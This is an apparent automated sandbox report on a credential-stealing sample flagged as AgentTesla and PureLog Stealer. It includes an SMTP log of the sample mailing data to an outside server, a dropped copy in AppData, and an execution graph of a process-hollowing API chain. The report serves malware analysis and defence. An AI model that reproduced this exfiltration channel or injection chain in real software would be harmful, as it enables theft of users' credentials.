                                              May 27, 2024 15:15:21.290302038 CEST49715587192.168.2.566.29.151.236MAIL FROM:<sendanell@jahnindustry.shop>
                                              May 27, 2024 15:15:21.465789080 CEST5874971566.29.151.236192.168.2.5250 2.1.0 Ok
                                              May 27, 2024 15:15:21.465991974 CEST49715587192.168.2.566.29.151.236RCPT TO:<nell@jahnindustry.shop>
                                              May 27, 2024 15:15:21.641460896 CEST5874971566.29.151.236192.168.2.5250 2.1.5 Ok
                                              May 27, 2024 15:15:21.641686916 CEST49715587192.168.2.566.29.151.236DATA
                                              May 27, 2024 15:15:21.813536882 CEST5874971566.29.151.236192.168.2.5354 End data with <CR><LF>.<CR><LF>
                                              May 27, 2024 15:15:21.815064907 CEST49715587192.168.2.566.29.151.236.
                                              May 27, 2024 15:15:22.105259895 CEST5874971566.29.151.236192.168.2.5250 2.0.0 Ok: queued as 89D9763E54
                                              May 27, 2024 15:16:47.789150000 CEST49705587192.168.2.566.29.151.236QUIT
                                              May 27, 2024 15:16:47.953844070 CEST5874970566.29.151.236192.168.2.5221 2.0.0 Bye

                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:09:14:54
                                              Start date:27/05/2024
                                              Path:C:\Users\user\Desktop\Copy#51007602.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\Copy#51007602.exe"
                                              Imagebase:0x210000
                                              File size:2'696'656 bytes
                                              MD5 hash:D503277EBD054E3A3CCFE906CAC2E6D8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2114770908.00000000045DE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2125383195.0000000005400000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2123443818.00000000050D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2114770908.0000000004391000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2114770908.0000000003991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2114770908.0000000003991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2114770908.0000000003991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:2
                                              Start time:09:15:05
                                              Start date:27/05/2024
                                              Path:C:\Users\user\Desktop\Copy#51007602.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\Copy#51007602.exe"
                                              Imagebase:0xd60000
                                              File size:2'696'656 bytes
                                              MD5 hash:D503277EBD054E3A3CCFE906CAC2E6D8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3235618888.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.3235618888.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.3235618888.0000000003307000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:false

                                              General

                                              Target ID:4
                                              Start time:09:15:14
                                              Start date:27/05/2024
                                              Path:C:\Users\user\AppData\Roaming\itdtn.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\itdtn.exe"
                                              Imagebase:0xab0000
                                              File size:293'997'803 bytes
                                              MD5 hash:C62B7992DB97A6341DACBE7E3D936C74
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2235868873.0000000004CA6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2235868873.0000000004DBE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2235868873.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2229535791.0000000003633000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2229535791.0000000003633000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2235868873.0000000005056000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2235868873.0000000005056000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2235868873.0000000004CCE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2229535791.0000000003371000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:5
                                              Start time:09:15:17
                                              Start date:27/05/2024
                                              Path:C:\Users\user\AppData\Roaming\itdtn.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\itdtn.exe"
                                              Imagebase:0xd70000
                                              File size:293'997'803 bytes
                                              MD5 hash:C62B7992DB97A6341DACBE7E3D936C74
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3236815937.0000000003347000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.3236815937.0000000003321000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3236815937.0000000003321000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.3231826482.000000000042F000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3231826482.000000000042F000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:false

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:11.4%
                                                Dynamic/Decrypted Code Coverage:99.3%
                                                Signature Coverage:0%
                                                Total number of Nodes:404
                                                Total number of Limit Nodes:4
                                                execution_graph 51893 acd01c 51894 acd034 51893->51894 51895 acd08f 51894->51895 51897 548e258 51894->51897 51898 548e2b1 51897->51898 51901 548e7e8 51898->51901 51899 548e2e6 51902 548e815 51901->51902 51905 548e9ab 51902->51905 51906 548d670 51902->51906 51905->51899 51908 548d697 51906->51908 51910 548db70 51908->51910 51911 548dbb9 VirtualProtect 51910->51911 51913 548d754 51911->51913 51913->51899 51914 5500510 51915 5500525 51914->51915 51916 5500547 51915->51916 51919 55007f7 51915->51919 51924 5500ce9 51915->51924 51920 55007fb 51919->51920 51929 5501308 51920->51929 51972 55012f9 51920->51972 51925 55007fb 51924->51925 51926 55005c0 51924->51926 51927 5501308 14 API calls 51925->51927 51928 55012f9 14 API calls 51925->51928 51926->51916 51927->51926 51928->51926 51930 550131d 51929->51930 52015 550226a 51930->52015 52020 5501a2a 51930->52020 52028 5501fa9 51930->52028 52033 5501666 51930->52033 52038 5501aa6 51930->52038 52047 55019a4 51930->52047 52057 55014e2 51930->52057 52062 5501761 51930->52062 52067 55020e1 51930->52067 52072 5501520 51930->52072 52077 550233f 51930->52077 52085 550247e 51930->52085 52090 550187d 51930->52090 52095 5501cfc 51930->52095 52100 55017bb 51930->52100 52105 550147b 51930->52105 52110 55023f8 51930->52110 52115 5501df1 51930->52115 52120 5501e71 51930->52120 52125 55015b1 51930->52125 52130 550220f 51930->52130 52135 550148e 51930->52135 52140 55022ce 51930->52140 52147 5501c4a 51930->52147 52155 5501707 51930->52155 52160 5501987 51930->52160 52165 5501406 51930->52165 52170 5501605 51930->52170 52175 5502384 51930->52175 52180 5501ac4 51930->52180 52185 5501ede 51930->52185 52190 55018d9 51930->52190 52198 5501456 51930->52198 52203 5501b94 51930->52203 52208 5501594 51930->52208 52213 5501b53 51930->52213 52218 5502150 51930->52218 52223 5501fee 51930->52223 52228 55016ac 51930->52228 52233 550166b 51930->52233 51973 5501308 51972->51973 51975 5502150 5 API calls 51973->51975 51976 5501b53 5 API calls 51973->51976 51977 5501594 5 API calls 51973->51977 51978 5501b94 5 API calls 51973->51978 51979 5501456 5 API calls 51973->51979 51980 55018d9 5 API calls 51973->51980 51981 5501ede 5 API calls 51973->51981 51982 5501ac4 5 API calls 51973->51982 51983 5502384 5 API calls 51973->51983 51984 5501605 5 API calls 51973->51984 51985 5501406 5 API calls 51973->51985 51986 5501987 4 API calls 51973->51986 51987 5501707 5 API calls 51973->51987 51988 5501c4a 5 API calls 51973->51988 51989 55022ce 4 API calls 51973->51989 51990 550148e 5 API calls 51973->51990 51991 550220f 5 API calls 51973->51991 51992 55015b1 5 API calls 51973->51992 51993 5501e71 5 API calls 51973->51993 51994 5501df1 4 API calls 51973->51994 51995 55023f8 5 API calls 51973->51995 51996 550147b 5 API calls 51973->51996 51997 55017bb 5 API calls 51973->51997 51998 5501cfc 5 API calls 51973->51998 51999 550187d 5 API calls 51973->51999 52000 550247e 5 API calls 51973->52000 52001 550233f 7 API calls 51973->52001 52002 5501520 5 API calls 51973->52002 52003 55020e1 3 API calls 51973->52003 52004 5501761 5 API calls 51973->52004 52005 55014e2 5 API calls 51973->52005 52006 55019a4 9 API calls 51973->52006 52007 5501aa6 7 API calls 51973->52007 52008 5501666 5 API calls 51973->52008 52009 5501fa9 5 API calls 51973->52009 52010 5501a2a 7 API calls 51973->52010 52011 550226a 5 API calls 51973->52011 52012 550166b 5 API calls 51973->52012 52013 55016ac 3 API calls 51973->52013 52014 5501fee 5 API calls 51973->52014 51974 55005c0 51974->51916 51975->51974 51976->51974 51977->51974 51978->51974 51979->51974 51980->51974 51981->51974 51982->51974 51983->51974 51984->51974 51985->51974 51986->51974 51987->51974 51988->51974 51989->51974 51990->51974 51991->51974 51992->51974 51993->51974 51994->51974 51995->51974 51996->51974 51997->51974 51998->51974 51999->51974 52000->51974 52001->51974 52002->51974 52003->51974 52004->51974 52005->51974 52006->51974 52007->51974 52008->51974 52009->51974 52010->51974 52011->51974 52012->51974 52013->51974 52014->51974 52016 5501462 52015->52016 52238 5508300 52016->52238 52243 55082a0 52016->52243 52253 55082f0 52016->52253 52021 5501a30 52020->52021 52022 5501462 52021->52022 52279 55084d0 52021->52279 52284 55084e0 52021->52284 52025 5508300 2 API calls 52022->52025 52026 55082f0 2 API calls 52022->52026 52027 55082a0 5 API calls 52022->52027 52025->52022 52026->52022 52027->52022 52029 5501462 52028->52029 52030 5508300 2 API calls 52029->52030 52031 55082f0 2 API calls 52029->52031 52032 55082a0 5 API calls 52029->52032 52030->52029 52031->52029 52032->52029 52034 5501462 52033->52034 52035 5508300 2 API calls 52034->52035 52036 55082f0 2 API calls 52034->52036 52037 55082a0 5 API calls 52034->52037 52035->52034 52036->52034 52037->52034 52039 5501aaf 52038->52039 52040 5501a57 52038->52040 52041 5501462 52040->52041 52042 55084d0 2 API calls 52040->52042 52043 55084e0 2 API calls 52040->52043 52044 5508300 2 API calls 52041->52044 52045 55082f0 2 API calls 52041->52045 52046 55082a0 5 API calls 52041->52046 52042->52040 52043->52040 52044->52041 52045->52041 52046->52041 52048 55019b1 52047->52048 52049 5501d6e 52047->52049 52048->52049 52050 5501462 52048->52050 52297 5508358 52049->52297 52304 5508348 52049->52304 52052 5508300 2 API calls 52050->52052 52053 55082f0 2 API calls 52050->52053 52054 55082a0 5 API calls 52050->52054 52051 5501da8 52052->52050 52053->52050 52054->52050 52058 5501462 52057->52058 52059 5508300 2 API calls 52058->52059 52060 55082f0 2 API calls 52058->52060 52061 55082a0 5 API calls 52058->52061 52059->52058 52060->52058 52061->52058 52063 5501462 52062->52063 52064 5508300 2 API calls 52063->52064 52065 55082f0 2 API calls 52063->52065 52066 55082a0 5 API calls 52063->52066 52064->52063 52065->52063 52066->52063 52068 55020f9 52067->52068 52327 55029d8 52068->52327 52332 55029c8 52068->52332 52069 5502111 52073 5501462 52072->52073 52073->52072 52074 5508300 2 API calls 52073->52074 52075 55082f0 2 API calls 52073->52075 52076 55082a0 5 API calls 52073->52076 52074->52073 52075->52073 52076->52073 52078 5501a58 52077->52078 52079 5501462 52077->52079 52078->52077 52083 55084d0 2 API calls 52078->52083 52084 55084e0 2 API calls 52078->52084 52080 5508300 2 API calls 52079->52080 52081 55082f0 2 API calls 52079->52081 52082 55082a0 5 API calls 52079->52082 52080->52079 52081->52079 52082->52079 52083->52078 52084->52078 52086 5501462 52085->52086 52087 5508300 2 API calls 52086->52087 52088 55082f0 2 API calls 52086->52088 52089 55082a0 5 API calls 52086->52089 52087->52086 52088->52086 52089->52086 52091 5501462 52090->52091 52092 5508300 2 API calls 52091->52092 52093 55082f0 2 API calls 52091->52093 52094 55082a0 5 API calls 52091->52094 52092->52091 52093->52091 52094->52091 52096 5501462 52095->52096 52097 5508300 2 API calls 52096->52097 52098 55082f0 2 API calls 52096->52098 52099 55082a0 5 API calls 52096->52099 52097->52096 52098->52096 52099->52096 52101 5501462 52100->52101 52102 5508300 2 API calls 52101->52102 52103 55082f0 2 API calls 52101->52103 52104 55082a0 5 API calls 52101->52104 52102->52101 52103->52101 52104->52101 52106 5501462 52105->52106 52107 5508300 2 API calls 52106->52107 52108 55082f0 2 API calls 52106->52108 52109 55082a0 5 API calls 52106->52109 52107->52106 52108->52106 52109->52106 52111 5501462 52110->52111 52112 5508300 2 API calls 52111->52112 52113 55082f0 2 API calls 52111->52113 52114 55082a0 5 API calls 52111->52114 52112->52111 52113->52111 52114->52111 52116 5501e00 52115->52116 52118 5508358 4 API calls 52116->52118 52119 5508348 4 API calls 52116->52119 52117 5501e2b 52118->52117 52119->52117 52121 5501462 52120->52121 52122 5508300 2 API calls 52121->52122 52123 55082f0 2 API calls 52121->52123 52124 55082a0 5 API calls 52121->52124 52122->52121 52123->52121 52124->52121 52126 5501462 52125->52126 52127 5508300 2 API calls 52126->52127 52128 55082f0 2 API calls 52126->52128 52129 55082a0 5 API calls 52126->52129 52127->52126 52128->52126 52129->52126 52131 5501462 52130->52131 52132 5508300 2 API calls 52131->52132 52133 55082f0 2 API calls 52131->52133 52134 55082a0 5 API calls 52131->52134 52132->52131 52133->52131 52134->52131 52136 5501462 52135->52136 52137 5508300 2 API calls 52136->52137 52138 55082f0 2 API calls 52136->52138 52139 55082a0 5 API calls 52136->52139 52137->52136 52138->52136 52139->52136 52141 55022d4 52140->52141 52143 5506a50 WriteProcessMemory 52141->52143 52144 5506a20 WriteProcessMemory 52141->52144 52145 5506a12 WriteProcessMemory 52141->52145 52146 5506a58 WriteProcessMemory 52141->52146 52142 5502316 52143->52142 52144->52142 52145->52142 52146->52142 52148 5501c50 52147->52148 52154 55082a0 5 API calls 52148->52154 52362 55082b0 52148->52362 52149 5501462 52150 5508300 2 API calls 52149->52150 52151 55082f0 2 API calls 52149->52151 52152 55082a0 5 API calls 52149->52152 52150->52149 52151->52149 52152->52149 52154->52149 52156 5501462 52155->52156 52157 5508300 2 API calls 52156->52157 52158 55082f0 2 API calls 52156->52158 52159 55082a0 5 API calls 52156->52159 52157->52156 52158->52156 52159->52156 52161 5501994 52160->52161 52163 5508358 4 API calls 52161->52163 52164 5508348 4 API calls 52161->52164 52162 5501da8 52163->52162 52164->52162 52166 5501416 52165->52166 52167 5508300 2 API calls 52166->52167 52168 55082f0 2 API calls 52166->52168 52169 55082a0 5 API calls 52166->52169 52167->52166 52168->52166 52169->52166 52171 5501462 52170->52171 52172 5508300 2 API calls 52171->52172 52173 55082f0 2 API calls 52171->52173 52174 55082a0 5 API calls 52171->52174 52172->52171 52173->52171 52174->52171 52176 5501462 52175->52176 52177 5508300 2 API calls 52176->52177 52178 55082f0 2 API calls 52176->52178 52179 55082a0 5 API calls 52176->52179 52177->52176 52178->52176 52179->52176 52181 5501462 52180->52181 52182 5508300 2 API calls 52181->52182 52183 55082f0 2 API calls 52181->52183 52184 55082a0 5 API calls 52181->52184 52182->52181 52183->52181 52184->52181 52186 5501462 52185->52186 52187 5508300 2 API calls 52186->52187 52188 55082f0 2 API calls 52186->52188 52189 55082a0 5 API calls 52186->52189 52187->52186 52188->52186 52189->52186 52191 5501c4b 52190->52191 52192 5501462 52190->52192 52193 55082b0 3 API calls 52191->52193 52194 55082a0 5 API calls 52191->52194 52195 5508300 2 API calls 52192->52195 52196 55082f0 2 API calls 52192->52196 52197 55082a0 5 API calls 52192->52197 52193->52192 52194->52192 52195->52192 52196->52192 52197->52192 52199 5501462 52198->52199 52200 5508300 2 API calls 52199->52200 52201 55082f0 2 API calls 52199->52201 52202 55082a0 5 API calls 52199->52202 52200->52199 52201->52199 52202->52199 52204 5501462 52203->52204 52205 5508300 2 API calls 52204->52205 52206 55082f0 2 API calls 52204->52206 52207 55082a0 5 API calls 52204->52207 52205->52204 52206->52204 52207->52204 52209 5501462 52208->52209 52210 5508300 2 API calls 52209->52210 52211 55082f0 2 API calls 52209->52211 52212 55082a0 5 API calls 52209->52212 52210->52209 52211->52209 52212->52209 52214 5501462 52213->52214 52215 5508300 2 API calls 52214->52215 52216 55082f0 2 API calls 52214->52216 52217 55082a0 5 API calls 52214->52217 52215->52214 52216->52214 52217->52214 52219 5501462 52218->52219 52220 5508300 2 API calls 52219->52220 52221 55082f0 2 API calls 52219->52221 52222 55082a0 5 API calls 52219->52222 52220->52219 52221->52219 52222->52219 52224 5501462 52223->52224 52225 5508300 2 API calls 52224->52225 52226 55082f0 2 API calls 52224->52226 52227 55082a0 5 API calls 52224->52227 52225->52224 52226->52224 52227->52224 52229 55016bb 52228->52229 52368 5508490 52229->52368 52374 5508482 52229->52374 52230 55016de 52234 5501462 52233->52234 52235 5508300 2 API calls 52234->52235 52236 55082f0 2 API calls 52234->52236 52237 55082a0 5 API calls 52234->52237 52235->52234 52236->52234 52237->52234 52239 5508315 52238->52239 52258 5506790 52239->52258 52262 5506798 52239->52262 52240 5508337 52240->52016 52244 55082ab 52243->52244 52245 55082fa 52243->52245 52266 5505d10 52244->52266 52270 5505cd0 52244->52270 52275 5505d18 52244->52275 52251 5506790 VirtualAllocEx 52245->52251 52252 5506798 VirtualAllocEx 52245->52252 52246 5508337 52246->52016 52247 55082de 52247->52016 52251->52246 52252->52246 52254 55082fa 52253->52254 52256 5506790 VirtualAllocEx 52254->52256 52257 5506798 VirtualAllocEx 52254->52257 52255 5508337 52255->52016 52256->52255 52257->52255 52259 5506798 VirtualAllocEx 52258->52259 52261 5506854 52259->52261 52261->52240 52263 55067dc VirtualAllocEx 52262->52263 52265 5506854 52263->52265 52265->52240 52267 5505d13 Wow64SetThreadContext 52266->52267 52269 5505dd9 52267->52269 52269->52247 52272 5505cd3 52270->52272 52271 5505cda 52271->52247 52272->52271 52273 5505da3 Wow64SetThreadContext 52272->52273 52274 5505dd9 52273->52274 52274->52247 52276 5505d61 Wow64SetThreadContext 52275->52276 52278 5505dd9 52276->52278 52278->52247 52280 55084e0 52279->52280 52289 5506df0 52280->52289 52293 5506de8 52280->52293 52281 550850b 52281->52021 52285 55084f5 52284->52285 52287 5506df0 ResumeThread 52285->52287 52288 5506de8 ResumeThread 52285->52288 52286 550850b 52286->52021 52287->52286 52288->52286 52290 5506e34 ResumeThread 52289->52290 52292 5506e80 52290->52292 52292->52281 52294 5506deb ResumeThread 52293->52294 52296 5506e80 52294->52296 52296->52281 52298 550836d 52297->52298 52311 5506a50 52298->52311 52315 5506a58 52298->52315 52319 5506a12 52298->52319 52323 5506a20 52298->52323 52299 550838f 52299->52051 52305 550836d 52304->52305 52307 5506a50 WriteProcessMemory 52305->52307 52308 5506a20 WriteProcessMemory 52305->52308 52309 5506a12 WriteProcessMemory 52305->52309 52310 5506a58 WriteProcessMemory 52305->52310 52306 550838f 52306->52051 52307->52306 52308->52306 52309->52306 52310->52306 52312 5506a53 WriteProcessMemory 52311->52312 52314 5506b3a 52312->52314 52314->52299 52316 5506a94 WriteProcessMemory 52315->52316 52318 5506b3a 52316->52318 52318->52299 52320 5506a1a 52319->52320 52320->52299 52321 5506afb WriteProcessMemory 52320->52321 52322 5506b3a 52321->52322 52322->52299 52324 5506a2c 52323->52324 52324->52299 52325 5506afb WriteProcessMemory 52324->52325 52326 5506b3a 52325->52326 52326->52299 52328 55029ef 52327->52328 52329 5502a11 52328->52329 52337 5502d84 52328->52337 52343 5502d26 52328->52343 52329->52069 52333 55029ef 52332->52333 52334 5502d84 3 API calls 52333->52334 52335 5502d26 3 API calls 52333->52335 52336 5502a11 52333->52336 52334->52336 52335->52336 52336->52069 52338 5502dac 52337->52338 52349 5505920 52338->52349 52354 550595e 52338->52354 52358 5505968 52338->52358 52344 5502d2c 52343->52344 52346 5505920 CreateProcessA 52344->52346 52347 5505968 CreateProcessA 52344->52347 52348 550595e CreateProcessA 52344->52348 52345 55032c8 52346->52345 52347->52345 52348->52345 52352 5505923 52349->52352 52350 55032c8 52351 5505b87 CreateProcessA 52353 5505be4 52351->52353 52352->52350 52352->52351 52355 55059e8 CreateProcessA 52354->52355 52357 5505be4 52355->52357 52360 55059e8 CreateProcessA 52358->52360 52361 5505be4 52360->52361 52363 55082c5 52362->52363 52365 5505d10 Wow64SetThreadContext 52363->52365 52366 5505cd0 Wow64SetThreadContext 52363->52366 52367 5505d18 Wow64SetThreadContext 52363->52367 52364 55082de 52364->52149 52365->52364 52366->52364 52367->52364 52369 55084a5 52368->52369 52371 5505d10 Wow64SetThreadContext 52369->52371 52372 5505cd0 Wow64SetThreadContext 52369->52372 52373 5505d18 Wow64SetThreadContext 52369->52373 52370 55084be 52370->52230 52371->52370 52372->52370 52373->52370 52375 55084a5 52374->52375 52377 5505d10 Wow64SetThreadContext 52375->52377 52378 5505cd0 Wow64SetThreadContext 52375->52378 52379 5505d18 Wow64SetThreadContext 52375->52379 52376 55084be 52376->52230 52377->52376 52378->52376 52379->52376 52387 548ed38 52388 548ed7c VirtualAlloc 52387->52388 52390 548ede9 52388->52390 52380 f18338 52381 f18352 52380->52381 52382 f18362 52381->52382 52384 5482857 52381->52384 52386 548d670 VirtualProtect 52384->52386 52385 5482875 52386->52385

                                                Executed Functions

                                                Function 04EF183F Relevance: 16.1, Strings: 12, Instructions: 1143COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ,aq$4$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                • API String ID: 0-3443518476
                                                • Opcode ID: 1dafb25d08859bcfcf9a1110fe59117dd1727a800e8fd9aece10dabac808c204
                                                • Instruction ID: 70d8257ea944767a97557c752eddeb8380ba3cb213adc8fa03fd3bd9532fcbad
                                                • Opcode Fuzzy Hash: 1dafb25d08859bcfcf9a1110fe59117dd1727a800e8fd9aece10dabac808c204
                                                • Instruction Fuzzy Hash: ACB22534A00218DFDB18CFA9CD94BADB7B6FF48704F158599E605AB2A4DB71AC81CF50
                                                Function 04EF1B77 Relevance: 8.0, Strings: 6, Instructions: 495COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ,aq$4$$]q$$]q$$]q$$]q
                                                • API String ID: 0-324474496
                                                • Opcode ID: 5e58953f60f655d503e8bab3be41bec99c33dd0d42a8eedc316ff3e9f1b4c1d6
                                                • Instruction ID: 67b48604227319c0d23b5ff50a17dde9d6d4e23a9f80cbddbb8047120742c143
                                                • Opcode Fuzzy Hash: 5e58953f60f655d503e8bab3be41bec99c33dd0d42a8eedc316ff3e9f1b4c1d6
                                                • Instruction Fuzzy Hash: 51221834A00218DFDB24DFA5CD94BA9B7B2FF48305F1491A9D609AB2A5DB31AD81CF50
                                                Function 00F18AF0 Relevance: 7.2, Strings: 5, Instructions: 983COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 632 f18af0-f18b11 633 f18b13 632->633 634 f18b18-f18bff 632->634 633->634 636 f19301-f19329 634->636 637 f18c05-f18d16 634->637 640 f19a2f-f19a38 636->640 676 f18d1c-f18d46 637->676 641 f19337-f19341 640->641 642 f19a3e-f19a55 640->642 644 f19343 641->644 645 f19348-f1943c 641->645 644->645 664 f19466 645->664 665 f1943e-f1944a 645->665 668 f1946c-f1948c 664->668 666 f19454-f1945a 665->666 667 f1944c-f19452 665->667 670 f19464 666->670 667->670 673 f194ec-f1956c 668->673 674 f1948e-f194e7 668->674 670->668 695 f195c3-f19606 673->695 696 f1956e-f195c1 673->696 685 f19a2c 674->685 681 f192ca-f192f4 676->681 682 f18d4c-f18da7 676->682 692 f192f6 681->692 693 f192fe 681->693 689 f18da9 682->689 690 f18dac-f18db7 682->690 685->640 689->690 694 f191df-f191e5 690->694 692->693 693->636 697 f191eb-f19267 call f17e2c 694->697 698 f18dbc-f18dda 694->698 724 f19611-f1961a 695->724 696->724 740 f192b4-f192ba 697->740 701 f18e31-f18e46 698->701 702 f18ddc-f18de0 698->702 705 f18e48 701->705 706 f18e4d-f18e63 701->706 702->701 703 f18de2-f18ded 702->703 707 f18e23-f18e29 703->707 705->706 711 f18e65 706->711 712 f18e6a-f18e81 706->712 715 f18e2b-f18e2c 707->715 716 f18def-f18df3 707->716 711->712 713 f18e83 712->713 714 f18e88-f18e9e 712->714 713->714 720 f18ea0 714->720 721 f18ea5-f18eac 714->721 723 f18eaf-f18f1a 715->723 718 f18df5 716->718 719 f18df9-f18e11 716->719 718->719 725 f18e13 719->725 726 f18e18-f18e20 719->726 720->721 721->723 727 f18f1c-f18f28 723->727 728 f18f2e-f190e3 723->728 730 f1967a-f19689 724->730 725->726 726->707 727->728 738 f190e5-f190e9 728->738 739 f19147-f1915c 728->739 731 f1968b-f19713 730->731 732 f1961c-f19644 730->732 768 f1988c-f19898 731->768 735 f19646 732->735 736 f1964b-f19674 732->736 735->736 736->730 738->739 746 f190eb-f190fa 738->746 744 f19163-f19184 739->744 745 f1915e 739->745 742 f19269-f192b1 740->742 743 f192bc-f192c2 740->743 742->740 743->681 747 f19186 744->747 748 f1918b-f191aa 744->748 745->744 750 f19139-f1913f 746->750 747->748 754 f191b1-f191d1 748->754 755 f191ac 748->755 752 f19141-f19142 750->752 753 f190fc-f19100 750->753 757 f191dc 752->757 759 f19102-f19106 753->759 760 f1910a-f1912b 753->760 761 f191d3 754->761 762 f191d8 754->762 755->754 757->694 759->760 763 f19132-f19136 760->763 764 f1912d 760->764 761->762 762->757 763->750 764->763 